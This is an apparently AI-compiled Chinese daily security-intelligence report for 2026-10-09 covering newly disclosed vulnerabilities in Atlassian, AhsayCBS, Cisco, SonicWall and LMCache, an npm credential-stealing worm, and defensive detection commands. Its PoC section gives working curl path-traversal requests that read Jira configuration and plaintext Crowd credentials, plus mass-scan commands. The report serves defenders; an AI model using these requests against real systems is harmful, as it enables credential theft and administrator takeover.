☰
每日安全情报报告 · 2026-10-09
2026/10/9 8:59:21 网站建设 项目流程

每日安全情报报告 · 2026-10-09

由 AI 整理发布

一、报告摘要与风险概览

本期聚焦2026-10-07 ~ 2026-10-09新增/升级披露的高危漏洞与威胁。本期最大信号:Atlassian Data Center 未授权文件读取(CVE-2026-21589)在公开 PoC 后数小时内即遭在野利用,且已被 VulnCheck 列入 KEV;AhsayCBS 双漏洞(CVE-2026-105133/105134)自 10-07 起遭实战利用投放 webshell 与 XMRig;Cisco 单日披露 35 个漏洞(含 NX-OS 5 个 9.8 根权限 RCE 与 License On-Prem 一个 10.0 输入验证缺陷);SonicWall SMA1000 出现 10.0 预认证 SSRF;SecuShare Pro 出现 9.8 未认证命令注入。供应链侧,tensorlake npm 官方 SDK 投毒(Shai-Hulud 蠕虫)正在窃取开发者凭据。

风险等级数量代表项
🔴 紧急(在野利用)2CVE-2026-21589(Atlassian,KEV)、CVE-2026-105134(AhsayCBS,实战投毒)
🟠 严重(CVSS 9.8–10.0,暂无在野证据但影响面大)6+CVE-2026-76482、Cisco NX-OS 5 连、CVE-2026-102255、CVE-2026-107459、CVE-2026-105192、Fanvil X7A
🟡 高危(供应链/恶意软件/中危 RCE)3+tensorlake 投毒、PoeLLM、Splunk 三严重

二、最新高危漏洞(近 24–48 小时)

🔴 [紧急 · 已在野利用] CVE-2026-21589 — Atlassian Data Center 未授权任意文件读取

  • 漏洞类型:路径遍历 / 任意文件读取(CWE-22)
  • 受影响组件:Atlassian 全家桶 Data Center 自托管版——Jira Software、Jira Service Management、Confluence、Bitbucket、Bamboo、Crowd、Crucible、Fisheye(所有版本均受影响,Cloud 版已修复)
  • CVSS:9.3(Critical)
  • ⚠️ 在野利用:watchTowr 于 10-06 发布技术研究与公开 PoC 后,Previdian 蜜网在 2 小时内即捕获利用尝试;VulnCheck 于 10-07 将其加入 KEV 列表;SANS ISC 观测到来自 DigitalOcean IP 段的大规模扫描(134.199.x / 137.184.x / 146.190.x / 159.223.x 等)。利用源 IP:38.60.157[.]86、146.70.187[.]234、159.26.119[.]225。
  • 利用条件:无需认证,但需知道目标文件精确路径。根因是共享atlassian-plugins-webresource库将::双重解码为/,构造出../遍历原语。在 Crowd 集成部署中可读取WEB-INF/classes/crowd.properties明文凭据,进而通过 Crowd API 创建 Jira 管理员账户,实现身份系统接管。
  • 修复:各产品已发布修复版本(如 Jira 9.12.40 / 10.3.26 / 11.3.12,Confluence 9.2.26 / 10.2.19,Bitbucket 9.4.26 / 10.2.8 等)。临时缓解:WAF/反代拦截..邻接/、\、::(含%2e%2e%2f、%3a%3a编码),Confluence/Jira/JSM/Bamboo/Crowd 启用 Tomcat RewriteValve,Bitbucket 配置 urlrewrite.xml 规则。
  • 链接:Atlassian 官方公告 · watchTowr 技术研究与 PoC · Rapid7 ETR 分析 · SANS ISC 扫描观测 · NVD 详情

🔴 [紧急 · 实战投毒] CVE-2026-105133 / CVE-2026-105134 — AhsayCBS 认证绕过 + 未认证 RCE

  • 漏洞类型:CVE-2026-105133 不当认证(中危);CVE-2026-105134 认证绕过导致未认证远程代码执行(严重,以 NT AUTHORITY/SYSTEM 运行)
  • 受影响组件:AhsayCBS 备份管理控制台 ≤ 10.3.4(MSP 集中备份平台)
  • CVSS:CVE-2026-105134 为10.0
  • ⚠️ 在野利用:Huntress 自2026-10-07 23:20 UTC起观测到攻击者利用该漏洞对暴露主机实施 RCE,截至 10-08 已波及 5 家组织。攻击链:先用 105133 绕过认证,再用 105134 在 Web 目录写入 JSP webshell,并植入伪装成 Microsoft Edge 的 XMRig 挖矿程序,甚至部署监控任务管理器、深夜自动关闭的 AI 辅助 PowerShell 脚本。
  • 修复:截至发稿 Ahsay 尚未发布补丁。临时措施:限制管理接口公网暴露,排查失陷迹象(异常cbssvcX64.exe子进程、%TEMP% 下Taskgmr.ps1/msedge.exe/edge.exe/config.json等)。
  • 链接:Huntress 实战分析 · NVD CVE-2026-105134 · NVD CVE-2026-105133

🟠 [严重] CVE-2026-76482 — Cisco License On-Prem 输入验证不当

  • 漏洞类型:不当输入验证(CWE-347,关联缺失认证/凭据保护不足)
  • 受影响组件:Cisco License On-Prem(原 Smart Software Manager On-Prem),≤ 10-202608(9-202601 及更早需迁移)
  • CVSS:10.0(Critical)
  • 利用状态:Cisco 内部安全审查发现,暂无已知在野利用。
  • 修复:升级至10-202609(无临时规避方案,旧 SSM 品牌版本不会获得补丁,需迁移)。
  • 链接:Cisco 安全公告 · NVD 详情
  • 同批 hardening 项:CVE-2026-76480(缺失认证,9.8)、CVE-2026-76483(凭据保护不足,9.1)、CVE-2026-76484(代码注入,8.8);另 CVE-2026-20328、CVE-2026-76454 为未认证远程可达的 API/密码重置缺陷。

🟠 [严重] Cisco NX-OS 五连击 — Nexus 交换机根权限 RCE(CVSS 9.8)

  • 漏洞类型:输入验证不足导致的未认证远程代码执行 / DoS(CWE-122 等)
  • 受影响组件:Nexus 3000 / 9000 系列(standalone NX-OS 模式)
  • CVSS:5 项均为9.8
  • 启用条件(决定是否可利用):
  • CVE-2026-76471:NX-API(默认关闭),发送畸形 HTTP 请求
  • CVE-2026-76485 / 76486 / 76501:需启用 NGOAM,发送畸形 IP 包;76486 还需 SRv6 或 NV Overlay;76501 需 SRv6
  • CVE-2026-76465:需启用 MPLS OAM(默认关闭),发送畸形 MPLS echo 请求
  • 利用状态:Cisco 内部测试发现,暂无已知在野利用;Nexus 7000 与 ACI 模式不受影响。
  • 修复:用 Cisco Software Checker 查固定版本;无法立即升级的可禁用相关特性或用 Cisco Live Protect 临时防护。
  • 链接:Cisco NX-OS 公告 · NVD CVE-2026-76471

🟠 [严重] CVE-2026-102255 — SonicWall SMA1000 预认证 SSRF

  • 漏洞类型:服务端请求伪造(SSRF,CWE-918)
  • 受影响组件:SonicWall SMA1000 系列(6210 / 7210 / 8200v),≤ 12.4.3-03526 或 ≤ 12.5.0-02952
  • CVSS:10.0(Critical,预认证)
  • 利用状态:SonicWall 称暂无在野利用证据,但全球有 400+ 台 SMA1000 暴露公网,且该系列 2026 年已多次遭勒索软件利用。
  • 修复:升级至 12.5.0-03082 或 12.4.3-03670。
  • 附带项:CVE-2026-102256(认证后 OS 命令注入 RCE)、CVE-2026-102257(Zip Slip 路径遍历)、CVE-2026-102258(存储型 XSS)。
  • 链接:SonicWall PSIRT SNWLID-2026-0017 · BleepingComputer 分析 · NVD 详情

🟠 [严重] CVE-2026-107459 — Openfind SecuShare Pro 未认证 OS 命令注入

  • 漏洞类型:OS 命令注入(CWE-78)
  • 受影响组件:Openfind SecuShare Pro v4(企业文件共享/文档管理平台),仅本地/定制部署受影响,MailCloud(EaaS)云版已更新
  • CVSS:9.8(CVSS 3.1)/ 9.3(CVSS 4.0)
  • 利用状态:TWCERT/CC 于 10-08 发布(TVN-202610001),暂无公开 PoC、无技术细节、无在野证据。单个 HTTP 请求即可执行命令,无需凭据。
  • 修复:联系 Openfind 技术支持获取版本更新,无临时规避方案。
  • 链接:ThreatAft 技术分析 · NVD 详情

🟠 [严重 · 无补丁] CVE-2026-105192 — LMCache 未认证 pickle 反序列化 RCE

  • 漏洞类型:不安全反序列化(CWE-502),通过未认证 ZeroMQ 传输触发pickle.loads远程代码执行
  • 受影响组件:LMCache 0.3.9 ~ 0.5.5(含 0.5.6rc3 及开发分支),multiprocess/distributed 模式且--host绑定到可路由地址(如 0.0.0.0)时暴露 TCP 5555
  • CVSS:9.8;另一独立缺陷CVE-2026-107204(/run_script HTTP 端点沙箱逃逸 RCE,CVSS 9.3)同期披露
  • 利用状态:JFrog 于 10-07 发布 PoC(单条未认证 ZeroMQ DEALER 消息即可触发);官方容器镜像以 root 运行,成功利用即获 root。截至发稿无官方补丁。
  • 临时缓解:避免--host绑定可路由地址,保持 localhost;用防火墙/K8s NetworkPolicy 限制 5555 端口仅允许 worker pod;降低进程权限。
  • 链接:JFrog 安全研究 · LMCache GitHub Issue #5510(/run_script 沙箱逃逸) · NVD CVE-2026-105192

🟠 [严重] Splunk Enterprise 三处严重漏洞

  • 漏洞类型:任意命令执行、未授权访问、代码注入(具体 CVE 编号以厂商公告为准)
  • 受影响组件:Splunk Enterprise、MCP Server、Add-on for AWS
  • 利用状态:Splunk 已发布修复,暂无在野利用报告。
  • 链接:Splunk 安全公告

🟡 [高危 · 供应链] tensorlake npm 官方 SDK 投毒(Shai-Hulud 蠕虫)

  • 事件:tensorlake 官方 TypeScript SDK 的0.5.144版本(10-08 发布后已从 npm 下架)在preinstall钩子中植入自传播凭据窃取蠕虫,自动收割 npm/GitHub token、AWS、Vault、K8s、SSH、.env、加密钱包,以及 Claude Code/Cursor/Kiro/Windsurf/Zed 的 MCP 配置;并通过 republish 受害者包、植入恶意 GitHub Actions、写入.claude/settings.json与.vscode/tasks.json实现持久化与传播。
  • 处置:立即卸载 0.5.144,轮换该机器上的所有凭据;属 ChainDrop / Shai-Hulud 攻击行动。
  • 链接:The Hacker News 报道 · Socket 分析 · StepSecurity 分析 · GitHub Issue #1014

🟡 [高危] 其他近期高危项(速览)

  • Fanvil X7A / PA2S管理端口诊断 ping 工具未认证命令注入:CVE-2025-70518(X7A,CVSS10.0)、CVE-2025-70521(X7A + PA2S,CVSS 9.8),固件 2.6.0.1182,建议从不可信网络移除管理访问。来源:DarkPoint 披露
  • PoeLLM 恶意软件感染3400+ 台暴露的 AI 服务器(LiteLLM/Ollama/Gotenberg/Gitea 等),用于门罗币挖矿,C2 地址隐藏。来源:BleepingComputer
  • .gh / .sl / .as 国家顶级域注册局被入侵,攻击者篡改权威 DNS 记录并通过 CA 域名验证,为 Google 等域名签发未授权 HTTPS 证书;Chrome 已通过 CRLSet 拦截,Google 配合撤销。来源:BleepingComputer

三、最新漏洞 PoC / 利用与检测步骤

说明:标注「PoC」为可直接复现的利用示例;标注「检测/版本核查」为防御侧排查命令,非攻击利用。

1. 🔴 [PoC] Atlassian CVE-2026-21589 — 未授权任意文件读取(含 Crowd 接管)

PoC A:手动利用(已验证的请求形态,来自 SANS ISC 捕获的实战扫描)

# 读取 Jira 的 WEB-INF/web.xml(Tomcat 必需文件,等价于应用内 /etc/passwd) curl -k 'https://TARGET/jira/download/..%3a%3aWEB-INF/web.xml' # 读取 Crowd 集成部署中的明文凭据(可导致 Jira 管理员接管) curl -k 'https://TARGET/jira/download/..%3a%3aWEB-INF/classes/crowd.properties' # SANS ISC 观测到的其他实战遍历形态 curl -k 'https://TARGET/s/1.0//download/resources/com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL:avatar/avatar/..%3a%3a..%3a%3a..%3a%3a..%3a%3a..%3a%3aWEB-INF::urlrewrite.xml'

PoC B:Nuclei 自动化检测(需克隆官方模板库)

# 1) 克隆 Nuclei 社区模板库 git clone https://github.com/projectdiscovery/nuclei-templates.git cd nuclei-templates # 2) 安装 nuclei(如未安装) go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest # 或:pipx install nuclei(视发行版而定) # 3) 对目标批量扫描(使用 CVE-2026-21589 相关模板) nuclei -u https://TARGET -tags cve-2026-21589 -silent # 也可对资产列表扫描: nuclei -l targets.txt -tags cve-2026-21589 -o results.txt
  • 参考:projectdiscovery/nuclei-templates · watchTowr 免费扫描器(GitHub) · Rapid7 ETR
  • 防御建议:上述命令仅授权于自有资产做合规排查;临时缓解与固定版本见第二节。

2. 🟠 [检测/版本核查] LMCache CVE-2026-105192 / CVE-2026-107204

# 1) 检查主机/容器内是否监听 5555(multiprocess ZMQ 端口) ss -ltnp | grep 5555 # 容器内: docker exec <container> ss -ltnp | grep 5555 # 2) 检查启动脚本/Helm values/K8s manifest 是否使用了 --host 可路由地址 grep -Rni "lmcache" ./deploy | grep -i "host" grep -Rni "5555" ./deploy # 3) 确认进程运行权限(官方镜像默认 root,需降权) ps aux | grep -i lmcache # 4) 关注 /run_script HTTP API 是否启用并可达(CVE-2026-107204) curl -k -m 5 https://TARGET:8000/run_script -X POST -d '{"code":""}'
  • 参考:LMCache GitHub Issue #5510 · JFrog 研究 · NVD CVE-2026-105192
  • 修复前:禁止--host绑定 0.0.0.0,仅限 localhost;用防火墙/NetworkPolicy 限制 5555。

3. 🔴 [检测/版本核查] AhsayCBS CVE-2026-105133/105134(在野)失陷排查

# 1) 确认版本是否 ≤ 10.3.4(含 10.3.4,均已受影响) # 登录 AhsayCBS 控制台 -> 关于/版本信息 # 2) 检查异常子进程(cbssvcX64.exe 派生可疑命令) Get-Process -Name cbssvcX64 -ErrorAction SilentlyContinue # Linux 部署: ps aux | grep -i ahsay # 3) 检查 %TEMP% / /tmp 下恶意落盘文件 ls -la %TEMP% | findstr /i "Taskgmr msedge edge config.json" # 同时排查 /var/lib/ahsay 等目录下异常 .jsp webshell # 4) 检查是否有伪装成 Edge 的 XMRig 进程与对外挖矿连接 netstat -ano | findstr /i "ESTABLISHED" | findstr /i ":3333 :8080 :443"
  • 参考:Huntress 实战报告(含 IoC)
  • 注意:本项目无公开利用脚本——上述为防御侧检测;Ahsay 截至发稿未发布补丁,务必限制管理接口公网暴露。

4. 🟠 [检测/版本核查] SonicWall SMA1000 CVE-2026-102255 暴露面核查

# 1) 确认设备型号与版本(6210/7210/8200v,且为 12.4.3-03526 或 12.5.0-02952 及更早) # 登录 AMC -> System -> Appliance Status 查看固件版本 # 2) 公网暴露面核查(确认 WorkPlace 接口是否可从互联网到达) nmap -p 443 --script ssl-cert TARGET_IP curl -k -m 5 https://TARGET/ -o /dev/null -w "%{http_code}\n" # 3) 升级至已修复版本 # 12.4.3-03526 -> 12.4.3-03670 或更高 # 12.5.0-02952 -> 12.5.0-03082 或更高
  • 参考:SonicWall PSIRT · Aviatrix 攻击路径分析

5. 🟠 [检测/版本核查] Cisco NX-OS CVE-2026-76471(NX-API)特性检查

# 在 Nexus 3000/9000(standalone NX-OS)上确认 NX-API 是否启用 switch# show feature | include nxapi # 示例输出(已启用): nxapi 1 enabled # 检查 NGOAM / MPLS OAM(另两项触发条件) switch# show feature | include ngoam switch# show feature | include mpls # 无明确固定版本时,用 Cisco Software Checker 定位升级版本 # https://sec.cloudapps.cisco.com/security/center/softwarechecker.x # 临时缓解:不需要时执行 `no feature nx-api` / `no feature mpls oam`;或用 Cisco Live Protect 临时防护
  • 参考:Cisco NX-OS 公告 · NVD CVE-2026-76471

6. 🟠 [检测/版本核查] SecuShare Pro CVE-2026-107459 补丁核查

# 1) 确认是否为本地/定制部署的 SecuShare Pro v4(云版 MailCloud/EaaS 不受影响) # 登录管理控制台 -> 系统信息查看版本 # 2) 目前无公开 PoC 与临时规避方案,唯一缓解为联系 Openfind 升级 # 运维侧:将管理接口置于内网,限制来源 IP,监控异常 HTTP 请求(命令注入特征)
  • 参考:ThreatAft 分析 · TWCERT/CC TVN-202610001

四、网络安全最新文章与深度阅读

  1. The Hacker News — Tensorlake npm 官方包投毒,投递 Shai-Hulud 凭据窃取蠕虫(2026-10-08)
    摘要:官方 tensorlake SDK 0.5.144 在 preinstall 钩子植入自传播蠕虫,窃取 npm/GitHub/AWS/Vault/SSH 及 AI 编码工具 MCP 配置,并通过重发布受害者包与恶意 CI 工作流扩散。
    阅读原文

  2. Huntress — 威胁者利用 AhsayCBS 严重漏洞投放 Webshell 与 XMRig 挖矿程序(2026-10-08)
    摘要:自 10-07 起实战利用 CVE-2026-105133/105134,链式认证绕过 + 未认证 RCE,落盘 JSP webshell 与伪装 Edge 的挖矿程序,已波及多家 MSP。
    阅读原文

  3. BleepingComputer — SonicWall 警告 SMA1000 网关最大严重级 SSRF 漏洞(2026-10-08)
    摘要:CVE-2026-102255(CVSS 10.0)预认证 SSRF,影响 6210/7210/8200v,全球 400+ 台暴露公网;修复版本 12.5.0-03082 / 12.4.3-03670。
    阅读原文

  4. BleepingComputer — PoeLLM 恶意软件感染 3400+ 台暴露的 AI 服务器进行挖矿(2026-10-08)
    摘要:Black Lotus Labs 披露新型 Linux 恶意软件 PoeLLM,针对 LiteLLM/Ollama/Gotenberg/Gitea 等暴露的 AI 与开发基础设施,单日峰值约 800 台活跃。
    阅读原文

  5. The Hacker News — .gh/.sl/.as 国家顶级域注册局被入侵,为 Google 等域名签发未授权证书(2026-10-08)
    摘要:攻击者篡改加纳、塞拉利昂、美属萨摩亚 ccTLD 权威 DNS,通过 CA 域名验证签发 Google 等品牌 HTTPS 证书;Google 系统未被直接入侵,Chrome 已通过 CRLSet 拦截。
    阅读原文

  6. The Hacker News — LibreOffice / OpenOffice 特殊代码执行链(2026-10-08)
    摘要:CVE-2026-63277(LibreOffice)与 CVE-2026-59265(Apache OpenOffice)构成无需宏即可触发的恶意文档执行链。
    阅读原文

  7. SANS Internet Storm Center — 针对 Atlassian CVE-2026-21589 的扫描观测(2026-10-06/07)
    摘要:披露后蜜网捕获来自 DigitalOcean IP 段的大规模利用扫描,给出真实攻击 URL 形态与源 IP 列表,佐证在野利用已规模化。
    阅读原文

  8. Rapid7 — Emergent Threat Response:Atlassian CVE-2026-21589 未授权任意文件访问(2026-10)
    摘要:评级 9.3(Critical),提供受影响产品矩阵、日志检测正则与缓解指南,建议跳出常规补丁周期紧急修复。
    阅读原文


部分内容由 AI 辅助生成

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询